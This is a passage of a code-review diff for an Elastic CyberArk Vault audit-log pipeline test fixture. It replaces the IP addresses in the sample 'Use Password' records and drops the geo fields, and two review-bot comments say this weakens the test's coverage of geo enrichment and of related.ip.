Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -958,9 +860,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 15 03:31:54", "desc": "Use Password" 
@@ -971,8 +873,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349060300Z", - "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" 
Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374533800Z", + "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 
03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", 
@@ -996,39 +898,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1044,7 +925,7 @@ }, "@timestamp": "2021-03-15T14:08:26.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
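Review bot: The new expected output deletes the whole `destination.geo` and `source.geo` objects instead of updating them for 67.43.156.15 and 67.43.156.13, so this fixture no longer asserts that the pipeline's geo enrichment produces anything for a public source/destination pair. If that is because the test GeoIP database has no city-level entry for these addresses, it would be worth saying so in the PR description or a `_dev` README note, since a later regression that drops the geoip processors would now pass this test unnoticed. Alternatively pick addresses from the supported subset that the test database does resolve, so `source.geo.country_iso_code` and `destination.geo.country_iso_code` remain pinned in the expected document.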
@@ -1055,17 +936,16 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:26Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n 
\u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, 
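Review bot: `related.ip` shrinks from three entries to two in this hunk because `Address` and `GatewayStation` were both rewritten to 67.43.156.15, so the fixture no longer proves that `cyberarkpas.audit.gateway_station` is added to `related.ip` as its own value; a regression that stopped appending the gateway station would still pass. Consider giving `GatewayStation` a third distinct address from the supported range (another 67.43.156.x host, if the subset permits) in the raw sample and regenerating, so the expected `related.ip` keeps three distinct entries. The same collapse appears in the parallel records later in this file.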
@@ -1073,7 +953,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1086,9 +966,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 15 07:08:26", "desc": "Use Password" 
@@ -1099,8 +979,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349063500Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374538300Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n 
\u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 